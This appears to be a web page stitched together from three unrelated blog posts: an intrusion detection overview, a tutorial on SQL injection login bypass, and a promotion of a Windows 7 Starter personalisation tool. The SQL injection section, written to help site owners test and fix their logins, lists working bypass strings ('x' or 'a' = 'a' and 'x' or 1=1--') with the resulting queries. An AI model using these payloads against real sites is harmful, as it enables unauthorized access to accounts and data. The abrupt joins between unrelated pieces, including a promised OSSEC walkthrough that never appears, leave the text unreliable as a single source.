An intrusion detection system (IDS) is used to monitor the entire network, it detects intruders; that is, unexpected, unwanted or unauthorized people or programs onnetwork. An intrusion detection system has a number of sensors that is used to detect unwanted or unexpected flow ofnetwork traffic, the major sensors as follows:
A sensor monitor log files
A sensor monitor TCP ingoing or outgoing connections
How Intrusion Detection System Works?
Intrusion detection system works by collecting information and then examining it. IDS collects data from it sensors and analyze this data to give notice to the system administrator about malicious activity on the network.
o An intrusion detection system can be run manually but most IT administrators find it easier to automate the system checks to ensure that nothing is accidentally overlooked. o We can mainly categorize an IDS into two type:
There is still a question, why we use IDS if there is firewall to perform these tasks, Firewall is used to stop unwanted traffic from entering or leaving the internal enterprise network, where as the IDS is deployed to monitor traffic in vital segments in the network, generating alerts when an intrusion is detected.
A firewall has got holes to let things through, without it you wouldn't be able to access the Internet or send or receive emails, there are different ways to bypass or cheat a firewall. Snort is an excellent open source Network Intrusion Detection System, OSSEC is an OpenSource Host-based Intrusion Detection System.
Below is an an overview of the basic architecture as well as practical examples of how tocustomize Open Source Host-based Intrusion Detection System to manage logging from your infrastructure and applications.
I want to show you just one way that hackers can get in to your website and mess it up, using a technique called SQL Injection. And then I'll show you how to fix it. This article touches on some technical topics, but I'll try to keep things as simple as possible. There are a few very short code examples written in PHP and SQL. These are for the techies, but you don't have to fully understand the examples to be able to follow what is going on. Please also note that the examples used are extremely simple, and Real Hackers™ will use many variations on the examples listed.
If your website doesn't use a database, you can relax a bit; this article doesn't apply to your site — although you might find it interesting anyway. If your site does use a database, and has an administrator login who has rights to update the site, or indeed any forms which can be used to submit content to the site — even a comment form — read on.
Warning
This article will show you how you can hack in to vulnerable websites, and to check your own website for one specific vulnerability. It's OK to play around with this on your own site (but be careful!) but do not be tempted to try it out on a site you do not own. If the site is properly managed, an attempt to log in using this or similar methods will be detected and you might find yourself facing charges under the Computer Misuse Act. Penalties under this act are severe, including heavy fines or even imprisonment.
What is SQL Injection?
SQL stands for Structured Query Language, and it is the language used by most website databases. SQL Injection is a technique used by hackers to add their own SQL to your site's SQL to gain access to confidential information or to change or delete the data that keeps your website running. I'm going to talk about just one form of SQL Injection attack that allows a hacker to log in as an administrator - even if he doesn't know the password.
Is your site vulnerable?
If your website has a login form for an administrator to log in, go to your site now, in the username field type the administrator user name.
In the password field, type or paste this:
x' or 'a' = 'a
If the website didn't let you log in using this string you can relax a bit; this article probably doesn't apply to you. However you might like to try this alternative:
x' or 1=1--
Or you could try pasting either or both of the above strings into both the login and password field. Or if you are familiar with SQL you could try a few other variations. A hacker who really wants to get access to your site will try many variations before he gives up.
If you were able to log in using any of these methods then get your web tech to read this article, and to read up all the other methods of SQL Injection. The hackers and "skript kiddies" know all this stuff; your web techs need to know it too.
The technical stuff
If you were able to log in, then the code which generates the SQL for the login looks something like this:
When you log in normally, let's say using userid admin and password secret, what happens is theadmin is put in place of
$username
and secret is put in place of
$password
. The SQL that is generated then looks like this:
SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'secret'
But when you enter
x' or 'a' = 'a
as the password, the SQL which is generated looks like this:
SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x' or 'a' = 'a'
Notice that the string:
x' or 'a' = 'a
has injected an extra phrase into the WHERE clause:
or 'a' = 'a'
. This means that the WHERE is always true, and so this query will return a row contain the user's details.
If there is only a single user defined in the database, then that user's details will always be returned and the system will allow you to log in. If you have multiple users, then one of those users will be returned at random. If you are lucky, it will be a user without administration rights (although it might be a user who has paid to access the site). Do you feel lucky?
How to defend against this type of attack
Fixing this security hole isn't difficult. There are several ways to do it. If you are using MySQL, for example, the simplest method is to escape the username and password, using themysql_escape_string() or mysql_real_escape_string() functions, e.g.:
SELECT * FROM users WHERE username = 'admin' and PASSWORD = 'x\' or \'a\' = \'a'
Those backslashes ( \ ) make the database treat the quote as a normal character rather than as a delimiter, so the database no longer interprets the SQL as having an OR in the WHERE clause.
This is just a simplistic example. In practice you will do a bit more than this as there are many variations on this attack. For example, you might structure the SQL differently, fetch the user using the user name only and then check manually that the password matches or make sure you always use bind variables (the best defence against SQL injection and strongly recommended!). And you should always escape all incoming data using the appropriate functions from whatever language your website is written in - not just data that is being used for login.
Today I am going to present really an interesting utility for the Windows 7 Starter users. You might be facing some problems when you have to change the desktop or display settings. You can’t apply the desktop wallpaper, screensaver, change the sound settings, desktop icons and many more. Moreover, your laptop is like a boring idiot box in front of you without these functions. But it is no more of a problem now. The new tool Personalisation Panel for Windows 7 starter sort out your problems and makes your laptop interesting. It will help you to format the display settings.
The tool is very light freeware. So, it can be downloaded very fast. It is portable and easy to use. Though the tool is self explanatory, the description given below will help you to understand and use it. The various options available has been represented in the snapshot below.
It helps you to change the Desktop Background, Window Color, Screen Saver and Sounds. You might have installed certain softwares for this purpose. They either does not provide all the functions or create problems while using.
The options are also available for changing the desktop icons. There are n number of icons available. The mouse pointers can also be changed. For every purpose, you can choose a new pointer from the list. You can set the new account picture. The picture will be displayed on the Welcome screen and the Start menu. You can select the picture either what the tool provides you or can browse it according to your choice from your photo gallery.
The tool helps you to change the display settings also. There are two display modes. The screen resolutioncan be varied. There are four types of orientation: Landscape, Portrait, Landscape (flipped) and Portrait (flipped).
Even the Taskbar and Start Menu can become interesting by changing their settings. The taskbar can be locked and auto-hide. It can be shifted top, left, right or bottom. The size of the icons on the taskbar can be decreased. Display of taskbar buttons can be adjusted. The system tray can be customised. These options will help you to work in a more convenient manner.
Through the video shown below to understand the working of this tool.
Now, Windows 7 Starter can also be viewed in the desired style. It is no more a plane black screen. View the desktop as you like.
